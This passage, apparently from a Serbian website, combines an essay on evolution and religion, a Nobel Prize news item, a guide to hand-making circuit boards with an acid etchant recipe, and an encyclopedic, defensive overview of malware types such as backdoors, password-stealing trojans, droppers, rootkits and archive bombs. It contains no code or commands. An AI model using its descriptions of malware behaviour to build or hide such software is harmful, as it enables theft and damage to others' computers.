određeni izazov evolucije, postoji više načina za dostizanje istog rešenja. Evolucija se samo ponavlja ako određene fenotipske inovacije imaju visoku verovatnoću za nastajanje ili ih favorizuje selekcija. Kada bi se evolucija ponovo desila, Homo sapiens možda i ne bi evoluirao, ali postoji verovatnoća da bi se to dogodilo kod nekih drugih organizama, takođe sa dve noge i dva oka. Kakve veze sa ovim ima Bog? Religija deluje u oblasti metafizike i nije podložna naučnom ispitivanju, ali možda i postoji naučno objašnjenje zašto religija postoji i kada se javila tokom evolucije. Ljudi poseduju jednu karakternu crtu koja ih razlikuje od drugih životinja, a to je neobična spremnost da se prihvati volja ili neka velika ideja zajednice kojoj se pripada, pa čak i da se za nju pogine. Da bi ovo funkcionisalo, pojedinac mora da bude spreman da žrtvuje trenutne lične interese za dobitak na duge staze. Takođe, potrebna je i određena zaštita od socijalnih parazita - koji uživaju koristi života u društvu, ali ne plaćaju cenu. Religija nudi rešenje za oba problema jer objavljuje da postoji pretnja od intervencije sile koja nije pod Ijudskom kontrolom, a deluje momentalno ili nakon smrti. Ideja o bogovima se u evoluciji javila sa razvitkom mozga, kako bi omogućila održavanje stabilnosti u velikoj Ijudskoj zajednici. Pojavila se nakon što su se pojavili anatomski moderni Ijudi godina i posle nastanka jezika koji je uslov za njeno postojanje. I dok se religija može posmatrati kao efikasno sredstvo za kažnjavanje, postoji i njena pozitivnija strana, ona je način da se pojača produktivnost grupe, ona je odbrambeni zid od nesavršenosti sveta. Podmetanjem nedodirljivog, nedokazivog, religija možda jeste učinila prevaru - možda i nije ali je uspela nešto što nauci, na dužu stazu, nikada nije polazilo za rukom da pruži utehu ma gde ona bila.
Nobelova nagrada za otkrice koje je omogucilo hard diskove Krajem osamdesetih godina prošlog veka, Francuz Albert Fert i Nemac Peter Grünberg su otkrili pojavu koja se danas naziva magnetorezistansa, odnosno magnetorezistivnost. Reč je o fenomenu koji je omogućio postojanje hard diskova i svih sličnih sistema za skladištenje podataka na bazi magneta. Nobelov Komitet je objavio, dvadesetak godina kasnije, da će dvojici naučnika biti uručena Nobelova nagrada za fiziku zbog ovog otkrića. Oni su 1994. godine dobili McGroddy nagradu, zajedno sa Stjuartom Parkinom. Fert je objavio svoja otkrića u Physical Review Letters (PRL) časopisu 21. novembra 1988. godine, a njegov rad je i dalje u listi 10 najčešće citiranih radova u istoriji časopisa. Grünberg, sa druge strane, nije objavio svoj rad do 1. marta 1989. godine, ali ga je nadležnim insititucijama dao na uvid devet meseci ranije. Obojici je priznato da su opisali i tačno razjasnili fenomen magnetorezistivnosti, te će sada podeliti Nobelovu nagradu. Pored prestiža, slave, priznanja i časti, podeliće i oko 1.5 miliona dolara novčane nagrade.
Uputstvo za izradu stampanih plocica 1. UVOD Štampana plocica (PCB - printed circuit board) može da se uradi rucno ili mašinski. Ovde ce biti opisane verzije rucne izrade za amaterske potrebe. Prvo je potrebno izabrati odgovarajuci materijal za izradu, pa pristupiti izradi PCB-a, koja se sastoji iz nekoliko faza. Faze u izradi su sledece: isecanje plocice, cišcenje bakarne površine, zaštita površina koje želimo da imamo na PCB-u, nagrizanje nepotrebnih bakarnih površina (ecovanje), skidanje zaštite sa bakra, bušenje, zaštita gotove plocice, kalajisanje, finalna obrada. U zavisnosti od nacina izrade i potreba, redosled može da bude i drugaciji, a neke faze da se izostave. 2. MATERIJAL ZA IZRADU
Za izradu PCB-a koriste se pertinaks i vitroplast koji mogu da budu jednostrani i dvostrani, tj. da imaju bakar nanet sa jedne ili obe strane. Pertinaks se uglavnom koristi za prototipove i hobi potrebe, dok se za izradu visokokvalitetnih plocica koristi iskljucivo vitroplast, mada može da se koristi i za hobi potrebe, ali je nešto skuplji od pertinaksa. Jednostrani pertinaks cete vrlo lako prepoznati "na oko" po boji koja je se krece od svetlo do tamno braon i nije providan. Doduše, ni vitroplast nije providan dok se ne ukloni bakar, ali se vrlo lako razlikuje od pertinaksa. Dvostrani pertinaks je malo teže razlikovati "na oko" od vitroplasta jer su obe površine prekrivene bakrom, pa je potrebno malo iskustva. 3. ISECANJE S obzirom da je pertinaks vrlo krt materijal, treba biti pažljiv pri isecanju da plocica ne pukne tamo gde ne treba. Jedan od sigurnijih nacina je korišcenje skalpera; zasecite sa obe strane skalperom nekoliko puta i jednostavno odlomite po liniji. Moguce ga je iseci i necim drugim, npr. makazama za lim, ali se u tom slucaju ivice iskrzaju pa je potrebna dodatna obrada. Da napomenemo i secenje malim modelarskim cirkularom, ali u tom slucaju treba uzeti u obzir da rez ima odredjenu debljinu, pa treba voditi o tome racuna pri obeležavanju linije za secenje. Vitroplast se ne može iseci skalperom jer je vrlo tvrd, ali se zato on odlicno sece makazama za lim, kako rucnim tako i stolnim, a takodje se može seci modelarskim cirkularom, ali ce se nekvalitetna testera brzo istupiti zbog njegove velike tvrdoce . Ako je potrebno, nakon isecanja treba "oboriti" ivice šmirglom ili turpijom. 4. CIŠCENJE BAKARNE POVRŠINE Ako je bakar oksidirao ili je zamašcen zbog pipanja prstima, treba ga ocistiti kako bi se materijal za zaštitu dobro prihvatio za bakar. Za skidanje oksidacije može da se upotrebi fina šmirgla ili neki drugi abrazivni materijal, a za odmašcivanje je najbolje upotrebiti neki deterdžent za sudove ili slicno sredstvo. 5. ZAŠTITA POVRŠINA KOJE SU NAM POTREBNE Za zaštitu bakarnih površina koje su nam potrebne i koje predstavljaju vodove, lemne tacke i ostale površine koje želimo da imamo na PCB-u, postoji puno metoda, a ovde ce biti opisan veci deo. FLOMASTER - ovo je jedan od najbržih nacina kada Vam nije bitan izgled, jer linije i lemne tacke ne izgledaju estetski. Ako hocete, možete da upotrebite lenjir za povlacenje linija, kako bi plocica izgledala nešto lepše. Potrebno je koristiti neki flomaster koji je otporan na nagrizanje; najcešce su to tzv. alkoholni flomasteri, ali nisu svi podjednako otporni na hemikaliju. Ako je to jedina tehnika kojom radite plocice, preporucujem da nabavite flomastere iz serije "EDDING" (postoje i drugi kvalitetni flomasteri) koje možete naci u CONRAD-u; jeste da su nešto skuplji, ali je kvalitet vrhunski, a ima ih sa nekoliko debljina vrha. LAK ZA NOKTE - pretpostavljam da se poneko i nasmeje pri samom pomenu ove tehnike, ali se ta tehnika vrlo uspešno koristila jer nije bilo moguce naci kvalitetan flomaster, a koristi se i danas u manjoj meri. Iako daje rezultate lošije od flomastera (gledano sa estetske strane), lak je otporniji na hemikalije, pa ako ste ostali bez flomastera ili nemate kvalitetan flomaster, ovo može da bude odlicna zamena. Ako se razredi, moguce ga je sipati u rapidograf sa debljim vrhom. RAPIDOGRAF - ako imate rapidograf, možete u njega da sipate tecnost otpornu na nagrizanje (npr. lak za nokte, mastilo za alkoholne flomastere) i njime da crtate PCB. Ako smatrate da jedan prolaz nije dovoljan, uradite i drugi, ali tada nemojte da vucete po vec postojecoj liniji, nego "tackajte" po njoj, kako ne bi ste izgulili prethodni sloj. Ovom tehnikom mogu da se dobiju vrlo tanke linije (ako imate rapidograf sa tankim vrhom) koje su potrebne ako provlacite linije izmedju nožica nekog IC-a. PAZITE da Vam se tecnost u rapidografu ne osuši jer može da se desi da rapidograf postane trajno neupotrebljiv. SELOTEJP - još jedna "smešna" tehnika, ali je ona odigrala veliku ulogu u "kamenom dobu" izrade PCB-a. Sastoji se u lepljenju selotejp trake na bakar i isecanju skalperom i uklanjanju nepotrebnih parcica. Važno je da se zalepljeni selotejp dobro pritisne, kako se hemikalija ne bi podvukla pod neku ivicu i odlepila ga. Danas ta tehnika može da se koristi ako na
PCB-u imate debele linije i velike kvadratne površine. LETRASET - to je, u stvari, set preslikaca prilogodjenih za izradu PCB-a. Postoje linije raznih debljina kao i lemne tacke raznih velicina i oblika. Nanosi se kao i svaki preslikac, postavljanjem na bakar i prelaskom tupim vrhom preko njega (npr. standardnom grafitnom olovkom). Iako izrada ovim nacinom zahteva malo više vremena, rezultati mogu da budu odlicni. Sve do sada navedene tehnike zahtevaju da se prvo obeleže tacke koje predstavljaju lemna mesta, kako bi se znalo kuda treba vuci linije. Jedna od tehnika kojom to možete da uradite sastoji se u sledecem: odštampajte na papir izgled PCB-a i to gledano sa strane bakra, zatim taj papir pricvrstite za pertinaks ili vitroplast i tackašem (kirnerom) obeležite lemna mesta, skinite papir i crtajte. Ako Vam tako odgovara, pre crtanja možete da izbušite rupice. Opisanim tehnikama podjedanko se rade jednostrane i dvostrane plocice, s tim što je za izradu dvostranih neophodno izbušiti rupice pre crtanja vodova. Sledi opis tehnika kod kojih ne samo da ne treba obeležiti lemna mesta tackašem, vec to nije preporucljivo, jer može doci do nepoklapanja izmedju obeleženih i stvarnih lemnih mesta. Jedino je kod izrade dvostranih PCB-a potrebno izbušiti nekoliko referentnih rupica radi poklapanja gornje i donje strane. TRANSFER FOLIJA - ova tehnika se sastoji u štampanju izgleda PCB-a laserom na specijalnoj foliji (mada mogu da se koriste i standardne, ali tada treba uzeti kvalitetnije) i termickom prenosu tonera na bakar. Za prenos je najbolje postaviti plocicu na blago zagrejanu ringlu tako da se bakar nalazi sa gornje strane, staviti foliju preko bakra i gumenim valjkom pritiskati preko sve dok toner ne predje na bakar. Iako ova tehnika deluje kao savršena, može da donese mnogo nerviranja jer je potrebno ostvariti idelane uslove za dobar kvalitet; potrebna je dobra folija, kvalitetan otisak na laseru, ravna bakarna površina na plocici, dobro podešena temperatura. Sve u svemu, tehnika je pogodna samo za prototipove. FOTO POSTUPAK - ova tehnika je pogodna kako za izradu jednog komada, tako i za manje serije, a dobijeni rezultati mogu da budu ravni profesionalnim. Iako mogu da se kupe plocice vec oslojene foto lakom, ako cesto radite plocice, jeftinije je da kupite foto lak, POZITIV 20, koji može da se nadje u bocicama spreja zapremine 100 i 200 ml (cuvanjem spreja pod odgovarajucim uslovima, vek trajanja može da bude i dve godine). Kompletan opis postupka procitajte ovde. SITO ŠTAMPA - tehnika izrade PCB-a sito štampom ista je kao i za standradno štampanje sitom. Ova tehnika se koristi za izradu vece kolicine PCB-a, jer je prilicno skupa za izradu jednog komada; rezultati dobijeni ovom tehnikom su odlicni, pa se koristi kako za amaterske, tako i za profesionalne potrebe. Pre stavljanja plocice pod sito OBAVEZNO proverite da nema oštrih ivica na njoj, jer u protivnom može da dodje do trajnog oštecenja, tj. cepanja sita. Ako je nekom od poslednje tri opisane tehnike potrebno uraditi dvostrani PCB, potrebno je prvo izbušiti nekoliko referentnih rupica, kako bi mogle da se poklope gornja i donja strana. Vrlo je važno da se pri bušenju tih rupica bušilica drži pod uglom od 90 stepeni u odnosu na PCB, jer u suprotnom nece biti moguce dobro poklopiti obe strane. 6. NAGRIZANJE (ECOVANJE) Nakon zaštite bakarnih površina koje želimo da ostanu na PCB-u, potrebno je ukloniti bakar koji nam nije potreban. Taj postupak se naziva nagrizanje ili ecovanje i najcesce se radi pomocu jedne od dve hemikalije. Prva se zove ferihlorid (FeCl3 - gvoždje III hlorid) i može da se kupi u specijalizovanim prodavnicama i to u dva oblika, tecnom i kristalnom. Ako kupite tecnost, odmah u nju možete da ubacite plocicu, a ako kupite kristale, potrebno ih je prema priloženom uputstvu rastvoriti u vodi. Isti rastvor može da se koristi više puta, sve dok nagriza bakar. Bolje je da sipate u posudu samo onoliko rastvora koliko Vam je potrebno, i da taj upotrebljeni rastvor cuvate u posebnoj posudi; kada taj rastvor prestane da nagriza, uzmite neupotrebljeni i to opet onoliko koliko Vam je potrebno. Vreme potrebno da se ukloni suvišan bakar zavisi od koncentracije i temeprature rastvora, kao i od zasicenosti vec korišcenog rastvora. Druga hemikalija koja se koristi za nagrizanje pravi se od vode, sone kiseline (HCl) i hidrogena (H2O2); sonu kiselinu možete naci u svakoj samousluzi, a hidrogen u apoteci ili frizerskom salonu. Jedan od recepata za pravljenje rastvora za nagrizanje, koji se nalazi u uputstvu koje stiže uz foto lak, glasi ovako: za 1 litar rastvora potrebno Vam je 770 ml vode, 200 ml 35% sone kiseline i 30 ml 30% hidrogena. Pošto je malo teže naci 35% kiselinu, možete da smanjite kolicinu vode, a povecate kolicinu kiseline. Licno ne koristim taj recept, pošto koristim kiselinu 18% i hidrogen 30%, i to bez vode. Kolicinu hidrogena odredjujem prema reakciji; ako posle desetak sekundi rastvor ne pocne da menja boju u zelenu, dodam još hidrogena, a ako je rekacija previše burna, tj. razvija se velika kolicina mehurica, dodam malo kiseline.
Obratite pažnju da je ovaj rastvor jako isparljiv i OTROVAN, pa se ne preporucuje njegovo korišcenje u zatvorenim prostorijama. Vreme potrebno za nagrizanje zavisi najviše od odnosa kiseline i hidrogena, ali i od temperature. Ne preporucuje se ponovno korišcenje jednom upotrebljnog rastvora, pa sipajte u posudu samo onoliko rastvora koliko je potrebno. Nakon što je sav nepotreban bakar uklonjen, plocicu je potrebno dobro isprati vodom. 7. SKIDANJE ZAŠTITE SA BAKRA Nakon što je sav nepotreban bakar uklonjen, treba skinuti sloj kojim smo zaštili bakarne površine koje su nam potrebne. Za skidanje flomastera, najbolje je upotrebiti medicinski alkohol; za skidanje laka za nokte, aceton; za skidanje selotejpa treba trljati pod mlazom vode ili premazati nitro razredjivacem i kada se sve skine, ponovo dobro ocistiti nitro razredjivacem kako bi se uklonio preostali lepak. Letraset se može ukloniti alkoholom ili nitro razredjivacem; foto lak i sloj tonera takodje nitro razredjivacem, a farba naneta sito štampom se uklanja sredstvom predvidjenim za tu farbu. Svaku od ovih zaštita (sem salotejpa) možete da uklonite i finom šmirglom, ali to treba izbegavati, jer je bakarni sloj ionako tanak, pa ga ne treba dodatno tanjiti. 8. BUŠENJE Najlakše je izbušiti plocicu pomocu male modelarske bušilice. Najcešce ce Vam trebati burgije precnika od 0,7mm do 1,2 mm, mada je poželjno imati i burgije od 1,5 mm, 2 i 3 mm. Postoje standardne i specijalne burgije; standardne burgije ce Vam biti dovoljne za bušenje pertinaksa, dok ce Vam, ako cesto koristite vitroplast, biti neophodne specijalne burgije, jer se standardne istupe posle par desetina izbušenih rupica (ako ste vešti, možete da ih naoštrite). Iako su specijalne burgijice skupe, za veliki broj rupica u vitroplastu prakticno su neophodne, ali je potrebno pažljivo rukovati sa njima jer su krte i vrlo lako pucaju. Za one koji nemaju dovoljno iskustva, za njihovo korišcenje preporucuje se nabavka stalka za bušilicu. Ako je ne slomite, moci cete, verovali ili ne, sa jednom burgijicom da izbušite nekoliko desetina hiljada rupica ! 9. ZAŠTITA GOTOVE PLOCICE Zaštita se vrši da bi se bakar zaštitio od oksidacije i time se produžio vek plocici. Za amaterske potrebe najjednostavnije je plocicu premazati rastvorom alkohola i kalafonijuma, ili nitrorazredjivaca i kalafonijuma. Time se pored zaštite ostvaruje i lakše lemljenje, pa je to vrlo poularan metod. Za profesionalnu primenu, plocice se zašticuju posebnim tzv. lot-stop lakom koji se nanosi sito štampom, a "maska" je takva da se lakom pokriva sve sem lemnih tacaka, cime se omogucava nesmetano lemljenje. 10. KALAJISANJE Kalajisanje može da se vrši rucno ili mašinski. Najcešca rucna metoda se sastoji u prethodnom premazivanju plocice rastvorom kalafonijuma u alkoholu ili nitro razredjivacu, kako bi se olakšalo nanošenje kalaja na bakar. Zatim se lemilicom sa adekvatno oblikovanim vrhom nanosi kalaj u tankom sloju po vodovima i lemnim tackama. U tom slucaju, to je ujedno i zaštita plocice, pa se posle kalajisanja može (ali ne mora) skinuti sasušeni premaz rastvora sa plocice nitro razredjivacem. Ako je plocica zašticena lot-stop lakom, kalajišu se, logicno, samo lemne tacke. 11. FINALNA OBRADA U finalnu obradu spada sve što je potrebno uraditi na plocici pre samog lemljenja, a to može da bude isravljanje uocenih nedostataka (npr. izbušiti preskocenu rupicu), obrada ivica plocice ili štampanje rasporeda i oznaka elemenata. Nakon toga, plocica je spremna za lemljenje. Pošto poslednje tri faze nisu neophodne, možete ih preskociti sve ili samo neku od njih.
Sigurnost I zastita Sledeca rubrika je napisana na engleskom jeziku jer nismo imali vremena da prevodimo. Nadamo se da razumete engleski jezik I da necete imati problema sa razumevanjem Sigurnost i zastita rubrike.
Trojan Programs Trojans can be classified according to the actions which they carry out on victim machines. · · · · · · · · · · ·
Backdoors General Trojans PSW Trojans Trojan Clickers Trojan Downloaders Trojan Droppers Trojan Proxies Trojan Spies Trojan Notifiers ArcBombs Rootkits
Backdoors Today backdoors are the most dangerous type of Trojans and the most widespread. These Trojans are remote administration utilities that open infected machines to external control via a LAN or the Internet. They function in the same way as legal remote administration programs used by system administrators. This makes them difficult to detect. The only difference between a legal administration tool and a backdoor is that backdoors are installed and launched without the knowledge or consent of the user of the victim machine. Once the backdoor is launched, it monitors the local system without the user's knowledge; often the backdoor will not be visible in the log of active programs. Once a remote administration utilitiy has been successfully installed and launched, the victim machine is wide open. Backdoor functions can include: · · · · · ·
Sending/ receiving files Launching/ deleting files Executing files Displaying notification Deleting data Rebooting the machine
In other words, backdoors are used by virus writers to detect and download confidential information, execute malicious code, destroy data, include the machine in bot networks and so forth. In short, backdoors combine the functionality of most other types of Trojans in one package.
Backdoors have one especially dangerous sub-class: variants that can propagate like worms. The only difference is that worms are programmed to propagate constantly, whereas these 'mobile' backdoors spread only after a specific command from the 'master'.
General Trojans This loose category includes a variety of Trojans that damage victim machines or threaten data integrity, or impair the functioning of the victim machine. Multi-purpose Trojans are also included in this group, as some virus writers create multi-functional Trojans rather than Trojan packs.
PSW Trojans This family of Trojans steals passwords, normally system passwords from victim machines. They search for system files which contain confidential information such as passwords and Internet access telephone numbers and then send this information to an email address coded into the body of the Trojan. It will then be retrieved by the 'master' or user of the illegal program. Some PSW Trojans steal other types of information such as: · · · · ·
System details (memory, disk space, operating system details) Local email client IP-address Registration details Passwords for on-line games
Trojan-AOL are PSW Trojans that steal passwords for aol (American Online) They are contained in a subgroups because they are so numerous.
Trojan Clickers This family of Trojans redirects victim machines to specified websites or other Internet resources. Clickers either send the necessary commands to the browser or replace system files where standard Internet urls are stored (e.g. the 'hosts' file in MS Windows). Clickers are used: · · ·
To raise the hit-count of a specific site for advertising purposes To organize a DoS attack on a specified server or site To lead the victim to an infected resource where the machine will be attacked by other malware (viruses or Trojans)
Trojan Downloaders This family of Trojans downloads and installs new malware or adware on the victim machine. The downloader then either launches the new malware or registers it to enable autorun according to the local operating system requirements. All of this is done without the knowledge or consent of the user.
The names and locations of malware to be downloaded are either coded into the Trojan or downloaded from a specified website or other Internet location.
Trojan Droppers These Trojans are used to install other malware on victim machines without the knowledge of the user. Droppers install their payload either without displaying any notification, or displaying a false message about an error in an archived file or in the operating system. The new malware is dropped to a specified location on a local disk and then launched. Droppers are normally structured in the following way:
The dropper functionality contains code to install and execute all of the payload files. In most cases, the payload contains other Trojans and at least one hoax: jokes, games, graphics and so forth. The hoax is meant to distract the user or to prove that the activity caused by the dropper is harmless, whereas it actually serves to mask the installation of the dangerous payload. Hackers using such programs achieve two objectives: · ·
Hidden or masked installation of other Trojans or viruses Tricking antivirus solutions which are unable to analyse all components
Trojan Proxies These Trojans function as a proxy server and provide anonymous access to the Internet from victim machines. Today these Trojans are very popular with spammers who always need additional machines for mass mailings. Virus coders will often include Trojan-proxies in Trojan packs and sell networks of infected machines to spammers.
Trojan Spies This family includes a variety of spy programs and key loggers, all of which track and save user activity on the victim machine and then forward this information to the master. Trojan-spies collect a range of information including:
· · · ·
Keystrokes Screenshots Logs of active applications Other user actions
These Trojans are most often used to steal banking and other financial information to support online fraud.
Trojan Notifiers These Trojans inform the 'master' about an infected machine. Notifiers confirm that a machine has been successfully infected, and send information about IP-address, open port numbers, the email address etc. of the victim machine. This information may be sent by email, to the master's website, or by ICQ. Notifiers are usually included in a Trojan 'pack' and used only to inform the master that a Trojan has been successfully installed on the victim machine.
Rootkits A rootkit is a collection of programs used by a hacker to evade detection while trying to gain unauthorized access to a computer. This is done either by replacing system files or libraries, or by installing a kernel module. The hacker installs the rootkit after obtaining user-level access: typically this is done by cracking a password or by exploiting a vulnerability. This is then used to gather other user IDs until the hacker gains root, or administrator, access to the system. The term originated in the Unix world, although it has since been applied to the techniques used by authors of Windows-based Trojans to conceal their actions. Rootkits have been used increasingly as a form of stealth to hide Trojan activity, something that is made easier because many Windows users log in with administrator rights.
ArcBombs These Trojans are archived files coded to sabotage the de-compressor when it attempts to open the infected archived file. The victim machine will slow or crash when the Trojan bomb explodes, or the disk will be filled with nonsense data. ArcBombs are especially dangerous for servers, particularly when incoming data is initially processed automatically: in such cases, an ArcBomb can crash the server. There are three types of ArcBombs: incorrect header in the archive, repeating data and a series of identical files in the archive. An incorrect archive header or corrupted data can both cause the de-compressor to crash when opening and unpacking the infected archive. A large file containing repeating data can be packed into a very small archive: 5 gigabytes will be 200 KB when packed using RAR and 480 KB in ZIP format. Moreover, special technologies exist to pack an enormous number of identical files in one archive without significantly affecting the size of the archive itself: for instance, it is possible to pack 10100 identical files into a 30 KB RAR file or a 230 KB ZIP file.
Other Malware Other malware includes a range of programs that do not threaten computers directly, but are used to create viruses or Trojans, or used to carry out illegal activities such as DoS attacks and breaking into other computers. · · · · · · ·
DoS and DDoS Tools Hacker Tools and Exploits Flooders Constructors and VirTools Nukers FileCryptors and PolyCryptors PolyEngines
DoS and DDoS Tools These programs attack web servers by sending numerous requests to the specified server, often causing it to crash under an excessive volume of requests. If the server is not backed by additional resources, it will signal the failure to process requests by denying service. This is why such attacks are called Denial of Service attacks. DoS programs conduct such attacks from a single computer with the consent of the user. Distributed Denial of Service (DDoS) attacks use a large number of infected machines without the knowledge or consent of their owners. DDoS programs can be downloaded onto victim machines by various methods. They then launch an attack either based on a date included in the code or when the 'owner' issues a command to launch the attack. Worms can carry a DoS procedure as part of their payload. For instance, on August 20, 2001, the CodeRed worm launched a successful attack on the official web site of the President of the USA (Whitehouse). Mydoom.a contained DDoS code directed against SCO's corporate site. The company, a Unix developer, closed the site on February 1, 2004, shortly after the beginning of the DdoS attack and moved it to a different URL.
Hacker Tools and Exploits These utilities are designed to penetrate remote computers in order to use them as zombies (by using backdoors) or to download other malicious programs to victim machines. Exploits use vulnerabilities in operating systems and applications to achieve the same result.
Flooders These utilities are used to flood data channels with useless packets and emails.
Constructors and VirTools Virus writers use constructor utilities to create new malicious programs and Trojans. It is known that constructors to create macro-viruses and viruses for Windows are in existence. Constructors can be used to generate virus source code, object modules and infected files. Some constructors come with a user interface where the virus type, objects to attack, encryption options, protection against debuggers and dissasemblers, text strings, multimedia effects etc. can be chosen from a menu. Less complex constructors have no interface, and read information about the type of virus to be built from the configuration file.
VirTools are all utilites created to simplify virus writing. They can also be used to analyze viruses to see how they can be used in hacking attacks.
Nukers Hackers use these utilities to crash attacked machines by sending specially coded/phrased requests. These requests exploit vulnerabilities in applications and operating systems to cause fatal errors.
FileCryptors and PolyCryptors These are hacker utilities used by virus writers use to encrypt malicious programs to prevent them being detected by antivirus software.
PolyEngines Polymorphic generators are not viruses in the true sense of the word. They do not propagate by opening, closing or writing code into files or reading and writing sectors. These programs encrypt the body of the virus and generate a deencryption routine. Virus writers usually spread polymorphic generators as archived files. The main file in a generator archive is the object module which contains the actual generator. This module always contains an external function that calls the generator.
(Deo rubrike koji je na srpskom jeziku.)
Malware (Malicious software) - maliciozni programi Malware se deli u sledeće grupe: 1. Mrežni crvi su programi koji za propagaciju (širenje) koriste LAN ili Internet sa ciljem penetracije udaljenih kompjutera, pokretanja vlastitih kopija na žrtvinom kompjuteru i daljeg širenja na nove sisteme. Gotovo svi crvi se šire kao datoteke u različitim oblicima, no, postoji i mali broj tkz. fileless ili packet crva koji se šire u obliku mrežnih paketa i direktno penetrišu RAM memoriju ciljnog kompjutera gde zatim njihov kod biva izvršen. Crvi se klasifikuju prema načinu propagacije na sledeći način: 1. Email crvi - šire se putem inficiranih email poruka. Mogu biti u obliku attachment-a ili email može sadržati link ka malicioznoj internet stranici. Ova vrsta crva sakuplja email adrese sa žrtvinog kompjutera sa ciljem daljeg širenja. 2. Instant messaging crvi - šire se putem sistema/aplikacija za instant poruke (MSN, ICQ) slanjem linkova ka inficiranim stranicama svima koji se nalaze u listi kontakata na žrtvinom kompjuteru. 3. Internet crvi - šire su kopiranjem crva u umrežene resurse, iskorišćavanjem propusta u operativnim sistemima da bi penetrisali kompjutere i/ili mreže te penetracijom javnih mreža i korišćenjem drugog malware-a kao nosioca za crva. Mnogi crvi koriste kombinaciju više metoda propagacije kako bi bili efikasniji u penetraciji potencijalnih meta infekcije. 4. IRC crvi - šire se prvenstveno spamovanjem kontakata pronađenih u žrtvinom kompjuteru malicioznim linkovima putem IRC chat kanala. 5. P2P crvi - šire se korišćenjem P2P mreža (mreža za razmenu datoteka) kopirajući se u deljene fascikle.
Složeniji P2P crvi imitiraju mrežni protokol ili određene P2P mreže pozitivno odgovarajući na sve zahteve i nudeći kopiju crva umesto tražene datoteke. *** 2. Virusi su vrsta malicioznog softvera koja širi vlastite kopije unutar pojedinog sistema sa ciljem pokretanja/izvršavanja malicioznog koda kada korisnik preduzme određenu akciju ili penetracije nekog drugog resursa unutar žrtvinog kompjutera. Virusi, za razliku od crva, ne koriste mrežne resurse za penetraciju u sistem. Kopije virusa mogu penetrisati druge kompjutere samo ako se inficiranom objektu pristupi i ako kod bude pokrenut od strane korisnika. Iz tog razloga, virusi se integrišu u izvršive datoteke legitimnih programa. Prema načinu ponašanja nakon izvršenja, moguće ih je klasifikovati u dve grupe: * nerezidentni virusi: po izvršavanju odmah traže druge datoteke koje bi mogle biti inficirane, inficiraju ih i predaju kontrolu legitimnom programu; * rezidentni virusi: po učitavanju u memoriju odmah predaju kontrolu legitimnom programu i ostaju aktivni u pozadini i inficiraju nove datoteke kada im pristupe drugi programi ili operativni sistem. U zavisnosti od okruženja u kome virusi deluju, moguće ih je podeliti u sledeće grupe: 1. Datotečni virusi koriste datotečni sistem datog operativnog sistema za propagaciju. Dele se na: * one koji inficiraju izvršive datoteke (najveća grupa); * one koji kreiraju duplikate datoteka (companion virusi); * one koji kreiraju vlastite kopije u različitim direktorijima; * one koji koriste određene mogućnosti datotečnog sistema (link virusi). 2. Boot sector virusi se upisuju ili u boot sector ili MBR (master boot record) ili modifikuju lokaciju aktivnog boot sector-a. Ranije su bili široko rasprostranjeni, ali su skoro nestali uvođenjem 32-bitnih procesora i ređim korišćenjem floppy diskova. 3. Macro virusi se gotovo isključivo pišu za MS Office aplikacije (Word, Excel, PowerPoint) koje čuvaju informacije u OLE2 formatu. Ovi virusi za propagaciju koriste svojstva macro jezika sa ciljem transfera iz jedne inficirane datoteke u drugu. 4. Script virusi predstavljaju podgrupu datotečnih virusa i pisani su u različitim script jezicima (VBS, JavaScript, BAT, PHP itd). Oni inficiraju neke druge skripte ili čine deo više-komponentnih virusa. Ovi virusi mogu inficirati i druge tipove datoteka (npr. HTML) ukoliko datotečni format podržava izvršavanje skripti. *** 3. Trojani su programi koji vrše određene akcije bez znanja ili pristanka korisnika: krađa podataka, uništavanje ili promena podataka, prouzrokovanje problema u radu kompjutera, korišćenje žrtvinog kompjutera za vršenje ilegalnih aktivnosti (slanje spama, izvođenje DoS napada...). Trojani se dele u sledeće grupe: 1. Backdoor trojani su alati za udaljenu administraciju koji omogućuju napadaču da upravlja inficiranim kompjuterom putem LAN-a ili Interneta. Jednom uspešno pokrenut backdoor, može da obavlja sledeće funkcije: * slanje/primanje datoteka; * otvaranje/brisanje datoteka; * pokretanje programa; * prikazivanje različitih obaveštenja; * brisanje podataka; * restartovanje kompjutera. 2. PSW trojani služe za krađu šifri (najčešće sistemskih šifri na žrtvinom kompjuteru). Oni pretražuju sistemske datoteke koje sadrže poverljive informacije kao što su šifre i brojevi telefona za pristup Internetu a zatim šalju te podatke na email adresu integrisanu u sam kod trojana. Pojedini PSW trojani kradu i druge tipove podataka kao: * podatke o sistemu; * podatke o email klijentu; * IP adresu; * detalje o registraciji; * šifre za on-line igre.
3. Clicker trojani (pre)usmeravaju žrtvin kompjuter ka određenim Internet stranicama ili resursima. Oni ili šalju neophodne komande browseru ili menjaju sistemske datoteke gde su pohranjeni standardni url-ovi (npr. hosts datoteku). Koriste se za: * povećanje broja pregleda reklama na internet stranicama ("click fraud"); * organizovanje DoS (Denial od Service) napada na određene servere ili stranice; * navođenje žrtve ka inficiranom resursu gde kompjuter biva napadnut drugim malware-om (virusima ili trojanima). 4. Downloader trojani služe za preuzimanje (download) i instalaciju novog malware-a na žrtvin kompjuter. Downloader nakon preuzimanja ili odmah pokreće novi malware ili mu omogućuje automatsko pokretanje sa sistemom. Nazivi i lokacije malware-a koji treba biti preuzet sa Interneta su ili integrisani u kod programa ili bivaju preuzeti sa određenih stranica. 5. Dropper trojani služe za instalaciju nekog drugog malware-a na žrtvinom kompjuteru bez znanja korisnika. Dropper trojani instaliraju svoj payload bez ikakvog obaveštenja ili prikazuju lažne poruke o greškama. Novi malware biva kopiran na određenu lokaciju i pokrenut. U većini slučajeva, dropper-ov payload sadrži druge trojane i bar jedan hoax (prevarU) čija je funkcija da zavara korisnika ili da prikrije aktivnosti prouzrokovane instalacijom novog malware-a. 6. Proxy trojani služe kao proxy server i obezbeđuju anoniman pristup Internetu preko žrtvinog kompjutera. Mreže ovakvih trojana se najčešće koriste u svrhu slanja spama. 7. Spy trojani predstavljaju različite špijunske programe i keylogger-e koji prate i snimaju korisničke aktivnosti na kompromitovanim kompjuterima i šalju te podatke svome kreatoru. OVi trojani se najčešće koriste za krađu bankovnih i finansijskih informacija. 8. Notifier trojani služe da bi kreatora malware-a obavestili da je određeni kompjuter inficiran i pri tome mu šalju IP adresu, brojeve otvorenih portova, email adrese itd. Pomenuti podaci bivaju poslati putem email-a, ICQ-a ili na određenu Internet stranicu. 9. Rootkit predstavlja skup programa korišćenih od strane hacker-a za izbegavanje detekcije prilikom pokušaja neovlašćenog pristupa kompjuteru. Pomenuti cilj se postiže zamenom sistemskih datoteka ili instalacijom kernel modula. Do instalacije rootkit-a dolazi nakon obezbeđivanja standardnih 